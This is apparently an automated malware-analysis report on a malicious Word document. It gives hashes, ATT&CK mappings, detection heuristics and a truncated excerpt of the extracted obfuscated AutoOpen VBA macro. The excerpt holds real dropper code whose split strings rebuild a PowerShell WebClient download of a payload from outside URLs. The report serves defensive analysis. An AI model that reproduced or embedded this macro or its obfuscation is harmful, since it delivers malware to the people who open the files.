Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 849b3f295ab273af…

MALICIOUS

Office (OLE)

143.0 KB Created: 2018-02-13 17:45:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 56805bf14c89898edbdbfc3f2bc5613e SHA-1: d58211f30a5113eebbefa71e2ce9f4f7b9314219 SHA-256: 849b3f295ab273af747e97a08f1881eb450ad2a9acc96c8cff1a45f0038dcfc5
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-exec VBA loader that uses CreateObject and Shell functions. The AutoOpen macro is present and attempts to execute code, likely to download and run a second-stage payload. The presence of VBA macros and the AutoOpen function strongly suggests a macro-based malware delivery mechanism.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6447965-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447965-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31711 bytes
SHA-256: 050125806e7bde5229f3ad646aaeca992275490fc9e0f09a81328831e5e5fdd0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rnBjvYfGMXFZ"
Sub AutoOpen()
On Error Resume Next
sJkkFmTcI = MoHw - Sgn(zFzYnVVERmaV) - (1862516 - Tan(3100425) / 3363170 - ChrW(SAzO))
uwBvXPPcu = ooi - Sgn(czT) - (9286772 - Tan(4118506) / 9947177 - ChrW(ESziRKMq))
BtoJiuBDE = XFs - Sgn(OwmrJ) - (7632932 - Tan(3872018) / 7243148 - ChrW(izqpiDRG))
Application.Run "SjMKQlCXakjl", sGulCvm
EDmsJAiwF = tPvzufuDz - Sgn(ZAYWQXJLrFXAn) - (9018242 - Tan(3630628) / 297374 - ChrW(QEwI))
vDMaWahDL = aDZjEfPcmqSFA - Sgn(scA) - (5901806 - Tan(8598161) / 4986520 - ChrW(wBjiwLvtw))
bIfKwwNOO = poSHpqDI - Sgn(taCKlQbCqC) - (1427218 - Tan(3800119) / 3892879 - ChrW(pPKZpHwOlQW))
End Sub
Function sGulCvm()
On Error Resume Next
udFozYA = QMnZQiUYcVKR - Sgn(YNFRLb) - (99377 - Tan(3401561) / 544234 - ChrW(RwrctfRsBPj))
trmcPVV = LkwcCE - Sgn(zJWs) - (3199593 - Tan(6322348) / 3026026 - ChrW(JFLRVN))
jILOK = WcZGasLdJ - Sgn(hJC) - (4072716 - Tan(4181720) / 6820049 - ChrW(wKFbuEav))
NYUfpSfnN = wGYhWAsJo + Mid(XiYYVskYfa + "mOVPnTYw+edSk'+'Nf7LkN+edS+edSLkNasfedS'+'+ed'+'SLkN+LedS+edSkNc inLkN+L'+'kN OLkN+LkNf7ALkN+L'+'PwwCdChQzwczUGtiMompCEAMracDC" + hKhFdVbRnR, 9, 89)
sUJdiXY = zdDqT - Sgn(TISH) - (458506 - Tan(6210752) / 5581370 - ChrW(vSvjOqY))
wdWnW = VTRDcC - Sgn(jluEljljptkQO) - (9122115 - Tan(7520657) / 7213630 - ChrW(JBQpEvKImhIj))
XiKoY = QcROiWHc - Sgn(mJjFndaJUhibu) - (5211894 - Tan(7205688) / 813129 - ChrW(pkwzzdzQdI))
TUcnwjBb = PHnpzNBjNTD + Mid(dOmfNpjWNunVmU + "IiWcbhSJDCqnisPvxW1+xW12BFL/?LkN+LkNhttxW1+xW1LkNxedS+edSW1+xW1+LkNp://LkN+LkNwww.xW1+xW1edS+edSsuacLkN+edS+edSLkNuLkedS+edSN+Lke'+'dS+iQAukbRYKBSb" + IAcYw, 17, 119)
LlXGowQh = VbJHR - Sgn(OcMi) - (9658736 - Tan(6146886) / 6424352 - ChrW(OWm))
WDipJBf = wUH - Sgn(TpIj) - (1134492 - Tan(6478178) / 4892647 - ChrW(bWJwKFSEI))
wRcLbWUPPrW = isoBMXzUQVAckV - Sgn(OIU) - (9827854 - Tan(6392618) / 9763819 - ChrW(DlCbWjsJDi))
skPNLCjH = zMQdNROHGwIjhc + Mid(aBwVB + "wMBjvlcVDzYfwwBJFzHN+LkxW1+xedS+'+'edSW1Ne-LkN+LkNILkN+LkNtemflS'+')LkN+LkN(Of7S'+'D'+'C);break;}catchxW1+xW1LkNxW1+xW1+LkNedS+edS{}LkN+LkN}LkN).RePLaczzTNKDuM" + KDjXfsnfjp, 20, 132)
VCwJiQXAI = Shijnwr - Sgn(OwNPzLDqhmwM) - (1066174 - Tan(5541221) / 3633584 - ChrW(kZOS))
phiwHD = jUKJmHRCFIzFH - Sgn(fklpsvuUdfuM) - (8054101 - Tan(2815576) / 5822344 - ChrW(NhYwfcCGNElnbd))
lMYZUbVMol = GwlnTwjWXwOriO - Sgn(RDYGvShIL) - (523883 - Tan(6483990) / 5982719 - ChrW(nKGszinNE))
bVMQICszIAF = ClOSRdkklQDazl + Mid(wwwwFbzBpDwk + "TihANiBwdUaDtUcptqhdLkN+LkNtem.LkN+LkNNet.WebedS'+'+edSCLkxW1+xW1N+LkNliLkN+LkNent;Of7NSLedS+edSkN+edS+edSLkNB = Of7LkN+L'+'kNnxW1+xW1sadaLkN+LkNsdLkN+LkedS+edSN.LkNxW1+xW1+LkNneLkN+'+'LkxW1+xW1NxtLkN+LkN(100VAuVnijB" + QbH, 22, 187)
ipLFPjNqhG = wbMNcOGRHjIvR - Sgn(npBbr) - (4408767 - Tan(3232444) / 850092 - ChrW(XipYjW))
BiJwQiDu = nIutbQaZF - Sgn(PQW) - (8692606 - Tan(6481740) / 5888063 - ChrW(cjShlAz))
mJAVshwWtOK = rMoimpauf - Sgn(AAXiXOcVqHzhV) - (8052108 - Tan(9951528) / 4224606 - ChrW(AEuCHuSjDlqTLo))
bcorlRXBk = KAdKBAQlXrn + Mid(iPViiZqZlmT + "sNuNtp:LkN+LxW1+xW1kN/xW1edS+edS+xW1LkN+'+'edS+edS'+'LkNxW'+'1+xW1/wLkN+edS+'+'edSL'+'kNww.exW1+xW1njoyexoLkN+LkNtictrLkN+xW1+xW1LkzkGMfGn" + iNrW, 4, 128)
tmPKi = lCfSdqUIV - Sgn(BrApmwDr) - (4886081 - Tan(2296479) / 7487951 - ChrW(CRPf))
owstjJz = KpXr - Sgn(pbTMiYzUXqNqri) - (7975157 - Tan(9135773) / 652771 - ChrW(CNZHpiANDwjJS))
hbIcHCfc = iGCZVZTiuFowuL - Sgn(jqLHvVdW) - (6385272 - Tan(7213701) / 8006942 - ChrW(QUwkN))
dYfqFTu = rAhdvuIDFP + Mid(rbKrw + "ouZFSJcMUnoHAr]39'+').edS+edSRePLaCeedS+edS(([cHAr]67+[cHAr]101+[cedS+edSHAr]118),[string][cHAr]36)J0b & ( ([stRiNG]OBYVErbosePreFeREnCe)[1,3]+xW1XxW1-JoInxW1xW'+'1)edS).REPlac'+'e(edMinHHkAaZiTXVQaCzKQpLbwr" + QtZqkqsFEwT, 12, 172)
vphIHHRC = DKvUbY - Sgn(DnAaldVwLC) - (2708669 - Tan(8494933) / 1081263 - Ch
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.